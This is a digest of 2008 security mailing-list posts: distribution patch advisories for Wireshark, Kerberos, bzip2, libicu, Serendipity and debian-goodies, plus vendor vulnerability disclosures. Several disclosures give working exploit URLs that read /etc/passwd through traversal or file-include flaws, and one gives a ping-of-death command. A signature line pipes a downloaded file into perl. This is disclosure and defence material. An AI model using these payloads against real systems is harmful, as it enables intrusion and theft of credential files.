[ GLSA 200803-32 ] Wireshark: Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-32 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Wireshark: Denial of Service Date: March 24, 2008 Bugs: #212149 ID: 200803-32 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple Denial of Service vulnerabilities have been discovered in Wireshark. Background == Wireshark is a network protocol analyzer with a graphical front-end. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/wireshark < 0.99.8>= 0.99.8 Description === Multiple unspecified errors exist in the SCTP, SNMP, and TFTP dissectors. Impact == A remote attacker could cause a Denial of Service by sending a malformed packet. Workaround == Disable the SCTP, SNMP, and TFTP dissectors. Resolution == All Wireshark users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-0.99.8" References == [ 1 ] CVE-2008-1070 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1070 [ 2 ] CVE-2008-1071 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1071 [ 3 ] CVE-2008-1072 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1072 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-32.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFH6BUquhJ+ozIKI5gRApGzAJ4lfbH9WHNkx9aN7wQJy7BTPwV73gCfSoY+ lAHeENYUVycUipIjSerYOhw= =Hh+U -END PGP SIGNATURE-
[ GLSA 200803-31 ] MIT Kerberos 5: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-31 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: MIT Kerberos 5: Multiple vulnerabilities Date: March 24, 2008 Bugs: #199205, #212363 ID: 200803-31 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilites have been found in MIT Kerberos 5, which could allow a remote unauthenticated user to execute arbitrary code with root privileges. Background == MIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol. kadmind is the MIT Kerberos 5 administration daemon, KDC is the Key Distribution Center. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-crypt/mit-krb5 < 1.6.3-r1 >= 1.6.3-r1 Description === * Two vulnerabilities were found in the Kerberos 4 support in KDC: A global variable is not set for some incoming message types, leading to a NULL pointer dereference or a double free() (CVE-2008-0062) and unused portions of a buffer are not properly cleared when generating an error message, which results in stack content being contained in a reply (CVE-2008-0063). * Jeff Altman (Secure Endpoints) discovered a buffer overflow in the RPC library server code, used in the kadmin server, caused when too many file descriptors are opened (CVE-2008-0947). * Venustech AD-LAB discovered multiple vulnerabilities in the GSSAPI library: usage of a freed variable in the gss_indicate_mechs() function (CVE-2007-5901) and a double free() vulnerability in the gss_krb5int_make_seal_token_v3() function (CVE-2007-5971). Impact == The first two vulnerabilities can be exploited by a remote unauthenticated attacker to execute arbitrary code on the host running krb5kdc, compromise the Kerberos key database or cause a Denial of Service. These bugs can only be triggered when Kerberos 4 support is enabled. The RPC related vulnerability can be exploited by a remote unauthenticated attacker to crash kadmind, and theoretically execute arbitrary code with root privileges or cause database corruption. This bug can only be triggered in configurations that allow large numbers of open file descriptors in a process. The GSSAPI vulnerabilities could be exploited by a remote attacker to cause Denial of Service conditions or possibly execute arbitrary code. Workaround == Kerberos 4 support can be disabled via disabling the "krb4" USE flag and recompiling the ebuild, or setting "v4_mode=none" in the [kdcdefaults] section of /etc/krb5/kdc.conf. This will only work around the KDC related vulnerabilities. Resolution == All MIT Kerberos 5 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-crypt/mit-krb5-1.6.3-r1" References == [ 1 ] CVE-2007-5901 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5894 [ 2 ] CVE-2007-5971 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971 [ 3 ] CVE-2008-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 [ 4 ] CVE-2008-0063 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063 [ 5 ] CVE-2008-0947 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-31.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[USN-590-1] bzip2 vulnerability
=== Ubuntu Security Notice USN-590-1 March 24, 2008 bzip2 vulnerability CVE-2008-1372 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libbz2-1.0 1.0.3-0ubuntu2.1 Ubuntu 6.10: libbz2-1.0 1.0.3-3ubuntu0.1 Ubuntu 7.04: libbz2-1.0 1.0.3-6ubuntu0.1 Ubuntu 7.10: libbz2-1.0 1.0.4-0ubuntu2.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that bzip2 did not correctly handle certain malformed archives. If a user or automated system were tricked into processing a specially crafted bzip2 archive, applications linked against libbz2 could be made to crash, possibly leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1.diff.gz Size/MD5:72067 9b73f1a1cbea8f8e7dfba9b0cd358bf3 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1.dsc Size/MD5: 833 180fa43bfd8645b2a0c353b8927961c4 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3.orig.tar.gz Size/MD5: 669075 8a716bebecb6e647d2e8a29ea5d8447f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1_amd64.deb Size/MD5: 268000 b9532e26529bda8991e97cd819544aba http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib32bz2-1.0_1.0.3-0ubuntu2.1_amd64.deb Size/MD5:38388 baf7e58f129b30288d0cf1f76df39255 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib32bz2-dev_1.0.3-0ubuntu2.1_amd64.deb Size/MD5:30688 1c98274562642c9a3dee9bb91c070b5a http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-1.0_1.0.3-0ubuntu2.1_amd64.deb Size/MD5:40978 b904382cd76c9ffcd0dc92a5c3219a1a http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-dev_1.0.3-0ubuntu2.1_amd64.deb Size/MD5:32500 f6bf61f94fc0b4351fd79532df9025b1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1_i386.deb Size/MD5: 265034 71b410100340e0df581c1dd8b5dfe316 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-1.0_1.0.3-0ubuntu2.1_i386.deb Size/MD5:35690 ad14744ff24eb1decb20995a7a9bbeb1 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-dev_1.0.3-0ubuntu2.1_i386.deb Size/MD5:29518 a835eb9af19b2c045393c8c4c483f51c http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-1.0_1.0.3-0ubuntu2.1_i386.deb Size/MD5:43012 4407f311343b9ca791aabf98bfdcd751 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-dev_1.0.3-0ubuntu2.1_i386.deb Size/MD5:32564 1b4dbd9a480cf4515cd7a7b64e1c215b powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1_powerpc.deb Size/MD5: 268616 c397d3782a2b937a84f05d39bbe0666d http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-1.0_1.0.3-0ubuntu2.1_powerpc.deb Size/MD5:39518 5dc92398adb2a55977e4aa395062deac http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-dev_1.0.3-0ubuntu2.1_powerpc.deb Size/MD5:33064 d8d02ff467de3cb1aa966d01d55bff63 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-1.0_1.0.3-0ubuntu2.1_powerpc.deb Size/MD5:43586 2c0696f8499181a13ca2c4a019972b9f http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-dev_1.0.3-0ubuntu2.1_powerpc.deb Size/MD5:33864 60dde6ba6b87d7bb261e04dfe1a89560 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/bzip2_1.0.3-0ubuntu2.1_sparc.deb Size/MD5: 266558 69f664880f5c2d982a7906c21d01b60d http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-1.0_1.0.3-0ubuntu2.1_sparc.deb Size/MD5:37524 1cc8f48aa7130c5d6523aa9be202b1d5 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib64bz2-dev_1.0.3-0ubuntu2.1_sparc.deb Size/MD5:31480 9a826b5230f20fe079150562ab96d427 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-1.0_1.0.3-0ubuntu2.1_sparc.deb Size/MD5:40510 3a5787038eb631638918245f0ecb0460 http://security.ubuntu.com/ubuntu/pool/main/b/bzip2/libbz2-dev_1.0.3-0ubuntu2.1_sparc.deb Size/MD5:32010 7a05d5fe1e1b4a90dfef111e01e6c661 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubun
[USN-591-1] libicu vulnerabilities
=== Ubuntu Security Notice USN-591-1 March 24, 2008 icu vulnerabilities CVE-2007-4770, CVE-2007-4771 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libicu343.4.1a-1ubuntu1.6.06.1 Ubuntu 6.10: libicu343.4.1a-1ubuntu1.6.10.1 Ubuntu 7.04: libicu363.6-2ubuntu0.1 Ubuntu 7.10: libicu363.6-3ubuntu0.1 After a standard system upgrade you need to restart applications linked against libicu, such as OpenOffice.org, to effect the necessary changes. Details follow: Will Drewry discovered that libicu did not properly handle '\0' when processing regular expressions. If an application linked against libicu processed a crafted regular expression, an attacker could execute arbitrary code with privileges of the user invoking the program. (CVE-2007-4770) Will Drewry discovered that libicu did not properly limit its backtracking stack size. If an application linked against libicu processed a crafted regular expression, an attacker could cause a denial of service via resource exhaustion. (CVE-2007-4771) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.06.1.diff.gz Size/MD5:10972 445f415e082f042548258f4c6c232558 http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.06.1.dsc Size/MD5: 619 523a7f45138a6053c2603ed6eb480fca http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a.orig.tar.gz Size/MD5: 9039695 d45f59eb03b22cff127173cd3017f2e6 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu-doc_3.4.1a-1ubuntu1.6.06.1_all.deb Size/MD5: 2915712 1101422b4eb7e5acdd12acc13336715a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.1_amd64.deb Size/MD5: 5875030 1ae964fbf3734b1c00549de786e2bbba http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.1_amd64.deb Size/MD5: 4792062 d7a03747efc590dfe4dea95158689d4f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.1_i386.deb Size/MD5: 5699304 981af70894449430248adf3d9e0db9b6 http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.1_i386.deb Size/MD5: 4737488 6464d31ea0559635c6198dff1f4bf5bd powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.1_powerpc.deb Size/MD5: 6048294 ca2d43737af359f7eacd578e25e079ce http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.1_powerpc.deb Size/MD5: 4941578 6cd24bc1bded8547014b75e34216ec4d sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.1_sparc.deb Size/MD5: 5943896 cf5fbe8f8aae07d732d96729647f174e http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.1_sparc.deb Size/MD5: 4869890 71f8ee63a63ace3f17e77432cae0b4e7 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.10.1.diff.gz Size/MD5:10981 810042a363ce70adbd4804b1e35ede3c http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.10.1.dsc Size/MD5: 619 7ba7b3d16d5293cd6917d023a9978f6e http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a.orig.tar.gz Size/MD5: 9039695 d45f59eb03b22cff127173cd3017f2e6 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu-doc_3.4.1a-1ubuntu1.6.10.1_all.deb Size/MD5: 2909022 aa55332464e3d391f414afaa8093f37f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.10.1_amd64.deb Size/MD5: 5871754 160edb49c21f746f207e2b6d8f151067 http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.10.1_amd64.deb Size/MD5: 4786816 afd1356e6b85cab7d2f75747f8aa7d03 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.10.1_i386.deb Size/MD5: 5750086 f3742740fef98eaaafc5145c7e895a2e http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.10.1_i386.deb Si
[SECURITY] [DSA 1528-1] New serendipity packages fix cross site scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1528-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst March 24, 2008http://www.debian.org/security/faq - Package: serendipity Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-6205 CVE-2008-0124 BugTraq ID : 28298 Debian Bug : 469667 Peter Hüwe and Hanno Böck discovered that Serendipity, a weblog manager, did not properly sanitise input to several scripts which allowed for cross site scripting. For the stable distribution (etch), this problem has been fixed in version 1.0.4-1+etch1. The old stable distribution (sarge) does not contain a serendipity package. For the unstable distribution (sid), this problem has been fixed in version 1.3-1. We recommend that you upgrade your serendipity package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/s/serendipity/serendipity_1.0.4.orig.tar.gz Size/MD5 checksum: 3058582 eaf26277af3d864fc3d6bbc6c42a00b7 http://security.debian.org/pool/updates/main/s/serendipity/serendipity_1.0.4-1+etch1.diff.gz Size/MD5 checksum:21652 3de75c5011be95ffea76afe72ac2b598 http://security.debian.org/pool/updates/main/s/serendipity/serendipity_1.0.4-1+etch1.dsc Size/MD5 checksum: 888 2f8a7d7009104ed9c7ca804c7b6a2b15 Architecture independent packages: http://security.debian.org/pool/updates/main/s/serendipity/serendipity_1.0.4-1+etch1_all.deb Size/MD5 checksum: 2756036 4b2b44137ed11caacba846c0761204f6 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBR+fYn2z0hbPcukPfAQKg0wf/czuQH07svGh4MbuvWf+WWO5EuxiKKAdV 5W+YGT+7UmxIjQjZMIK68hpwtEuR0Ndem1p2fcGqoqozCd0mfuAhQ9UTua1xJr6L kK97d8haU5c1NgdMw30ENNqOHLMzYkgsndkG2yzlnueXcI/YyIJVonyiNCoqO5WK zsTMYiVaDzvGI4fsBvval1jqjXyWGXU/1ECvCzBBI+jioBbL09lFDLQE0Jn1RbDW yqAZ2dIIeTf3wWYTM+uXu2lXi8ViRaFyYEGUfkUQ7T8k0B3csHIJ3BW/0MlhgERy XhHWeMRl6VAgqmlLlnfCUuRFW2AFtCyBm1s7wN+44px9OCUoWXEI0Q== =8CmS -END PGP SIGNATURE-
HIS-webshop is vulnerable against Directory-Traversal (www.shoppark.de)
HIS-Webshop is a shopping-system written in Perl by www.shoppark.de The script doesn´t check the "t"-parameter. Example: http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00 << Greetz Zero X >>
RE: hacking the mitsubishi GB-50A
> If you read your own post you would realize that Mitsubishi > kept the device ipaddress prefix as 192.168.1 so only you > can attack yourself. > 192.168 cannot be access from the internet ;-) > [unless you NAT at which point its your NAT config problem] Wow, I'm glad to hear that machines with private addresses can't be attacked unless NAT is misconfigured. I'm also glad that we only have to worry about attacks coming directly from the Internet, and that our LANs are as safe as ever. I'll stop worrying about securing Intranet devices and applications, and use 192.168.1 addressing as my only security measure from now on.
Re: Linksys phone adapter denial of service
orsino wrote: There's a difference between being able to get onto a network (via wifi maybe?) and getting physical access to a device. For starters this is a VoIP device (Product Name: SPA-2102), but even if it weren't it makes no difference to me and in the security realm it shouldn't make a difference to anyone else either. 1) I don't have an open network and if you do and are on this list its either going to be a honeypot or for theft of information (bad guys roam this list too) 2) Think about how insanely stupid it would be to "go on a live network" then ping a VoIP device offline. What does this accomplish other then pure stupidity. 3) Where is the vendor contact information. Was this meant to be posted to Bugtrag or Fool Disclosure? -- J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x3AC173DB smime.p7s Description: S/MIME Cryptographic Signature
Re: Linksys phone adapter denial of service
There's a difference between being able to get onto a network (via wifi maybe?) and getting physical access to a device. > [EMAIL PROTECTED] wrote: >> Linksys phone adapter denial of service >> >> Product Information >> Product Name: SPA-2102Serial Number: FM500G582390 >> Software Version: 3.3.6 Hardware Version: 1.2.5(a) >> >> Another device hit with the PoD! >> >> ping -l 65500 192.168.0.1 >> >> Only seems to work on the internal network. >> >> discovered by sipher >> >> http://core.ifconfig.se/~core/ >> > > This is just as bad as the "pull the plug out of the device" since > you're local attack. Is Linksys going to provide an epoxy fix for the > plug? > >
Re: Re: Linksys phone adapter denial of service
No, but its pretty sad that in 2008 a device is still vulnerable to this. I realize this is hardly an "attack". Uses are limited. Thanks.
Hamachi Password Disclosure Vulnerability
Hamachi VPN Client 1.0.2.5 Password Disclosure Vulnerability 1) Infos - Date : 2008-03-24 Product : Hamachi VPN Client 1.0.2.5 Version : 1.0.2.5 Vendor : www.hamachi.it/ Vendor Status : 2008-03-24 - Not Informed Discovered/Provided By : Giuseppe `Evilcry` Bonfa' - http://evilcry.altervista.org E-mail : evilcry[at]NOSPAM-gmail[dot]com 2) Security Issues --- --- [ Password Disclosure Vulnerability ] --- === Hamachi is a Client for Trusted VPN Tunneling. It presents a Password Disclosure Vulnerability, because User and Passwords are not correctly protected for Memory Sniffing Attacks, so a local attacker, with a basical Process Memory Dumper, could obtain the Connection Password. --- [ PoC ] --- === If a user has saved him/her own Password, a malicious user can launch a Process Memory Dumper and look through the dumped memory and with a simple string searching he can retrieve user /password Useful keywords: USERNAME XCHAT_WARNING_IGNORE= --- [ Patch ] --- === - No patch available from the vendor.
[DSECRG-08-021] Multiple LFI in PowerPHPBoard 1.00b
[DSECRG-08-021] Digital Security Research Group [DSecRG] Advisory Application:PowerPHPBoard Versions Affected: 1.00b Vendor URL: http://www.powerscripts.org/ Bug:Multiple Local File Include Exploits: YES Reported: 01.02.2008 Vendor Response:none Solution: none Date of Public Advisory:24.03.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** PowerPHPBoard has Multiple Local File Include vulnerabilities. 1. Local File Include vulnerability found in script footer.inc.php To exploit this vulnerability REGISTER_GLOBALS option must be ON in php config file. Code # if ($settings[footer]) { if (file_exists("inc/$settings[footer]")) { include("inc/$settings[footer]"); } else { echo "$lang_footerdoesntexists"; } } else { include("inc/footer.ppb"); } # Example: http://[server]/[installdir]/footer.inc.php?settings[footer]=../../../../../../../../../../../../../etc/passwd - 2. Local File Include vulnerability found in script footer.inc.php To exploit this vulnerability REGISTER_GLOBALS option must be ON in php config file. Code # if (!$handler) { if ($handler = @mysql_pconnect($mysql[server], $mysql[user], $mysql[password])) { ... } } ... $query = "SELECT * FROM ppb_config WHERE id='1'"; $result = mysql_query($query,$handler); $num = mysql_num_rows($result); if ($num != 0) { list($settings[id], $settings[boardtitle], $settings[boardurl], $settings[adminemail], $settings[header], $settings[footer], $settings[bordercolor], $settings[tablebg1], $settings[tablebg2], $settings[tablebg3], $settings[htmlcode], $settings[bbcode], $settings[smilies], $settings[newthread], $settings[newpost], $settings[language]) = mysql_fetch_array($result); } ... if ($settings[header]) { if (file_exists("inc/$settings[header]")) { include("inc/$settings[header]"); } else { echo "$lang_headerfiledoesntexists"; } } else { include("inc/header.ppb"); } # Example: http://[server]/[installdir]/header.inc.php?handler=1234&settings[header]=../../../../../../../../../../../../../etc/passwd About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Alexandr Polyakov DIGITAL SECURITY RESEARCH GROUP mailto:[EMAIL PROTECTED]
[DSECRG-08-020] RFI-LFI in PowerClan 1.14a
[DSECRG-08-020] Digital Security Research Group [DSecRG] Advisory Application:PowerClan Versions Affected: 1.14a Vendor URL: http://www.powerscripts.org/ Bug:Remote/Local File Include Exploits: YES Reported: 01.02.2008 Vendor Response:none Solution: none Date of Public Advisory:..2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Remote/Local File Include vulnerability found in script footer.inc.php To exploit this vulnerability REGISTER_GLOBALS option must be ON in php config file. Code # include($settings[footer]); # Example: http://[server]/[installdir]/footer.inc.php?settings[footer]=../../../../../../../../../../../../../etc/passwd About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Alexandr Polyakov DIGITAL SECURITY RESEARCH GROUP mailto:[EMAIL PROTECTED]
[DSECRG-08-019] LFI in PowerBook 1.21
Hello, bugtraq. [DSECRG-08-031] Digital Security Research Group [DSecRG] Advisory Application:PowerBook Versions Affected: 1.21 Vendor URL: http://www.powerscripts.org/ Bug:Local File Include Exploits: YES Reported: 01.02.2008 Vendor Response:none Solution: none Date of Public Advisory:..2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Local File Include vulnerability found in script pb_inc/admincenter/index.php Non-authentication user can directly access to this script. To exploit this vulnerability REGISTER_GLOBALS option must be ON in php config file. Code # if (!$page) { $page = "home"; } $page .= ".inc.php"; if(file_exists($page) == false) { echo " Sorry, the page $page does not exist! "; } else { include("$page"); } # Example: http://[server]/[installdir]/pb_inc/admincenter/index.php?page=../../../../../../../../../../../../../etc/passwd%00 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Alexandr Polyakov DIGITAL SECURITY RESEARCH GROUP mailto:[EMAIL PROTECTED]
[SECURITY] [DSA 1527-1] New debian-goodies packages fix privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1527-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst March 24, 2008http://www.debian.org/security/faq - Package: debian-goodies Vulnerability : insufficient input sanitising Problem type : local Debian-specific: yes CVE Id(s) : CVE-2007-3912 Debian Bug : 440411 Thomas de Grenier de Latour discovered that the checkrestart tool in the debian-goodies suite of utilities, allowed local users to gain privileges via shell metacharacters in the name of the executable file for a running process. For the stable distribution (etch), this problem has been fixed in version 0.27+etch1. For the old stable distribution (sarge), this problem has been fixed in version 0.23+sarge1. For the unstable distribution (sid), this problem has been fixed in version 0.34. We recommend that you upgrade your debian-goodies package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.23+sarge1.tar.gz Size/MD5 checksum:11779 e0834e7e962fabc65362a60c73362585 http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.23+sarge1.dsc Size/MD5 checksum: 819 37eb124fef7c9897ea41ec861ec740ff Architecture independent packages: http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.23+sarge1_all.deb Size/MD5 checksum:22488 c8bc8eab12c7e3f29e53f4172ee837a4 Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.27+etch1.dsc Size/MD5 checksum: 836 8653d033f9e6b9f0949fab2cc1813970 http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.27+etch1.tar.gz Size/MD5 checksum:28708 089ff8f154eb3fe4bc47dd85f1581a65 Architecture independent packages: http://security.debian.org/pool/updates/main/d/debian-goodies/debian-goodies_0.27+etch1_all.deb Size/MD5 checksum:36868 2739973911e8b0d9ec12559507f6a708 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBR+e+pmz0hbPcukPfAQKaXQgAp/pr+VzHt3ffa8JXbydWVn4uBGsXs/Xe eEJHc9amXTpDXvV6M3MOspbmX7bNXLCVpAx3TEudeJN+NqPodygIlZbh1sNoGE+y uXR7bhCK4lHobQPEhCINEaIeP3sIQSpPGIafXFQccSgIxFcu3tJZMXbFNDJ5dfVp YFgR7fCuIf0OAMEEyLR/RaUTuuU4MO7be31JNxBhqsqm0fxm7Rhz9MXyslt5WXYp H25noMcJa1sgVw9pworhXvSXq0GXAe7Z5Q9l50udN42/BrWXs7ud/BpWPVzrLRUZ 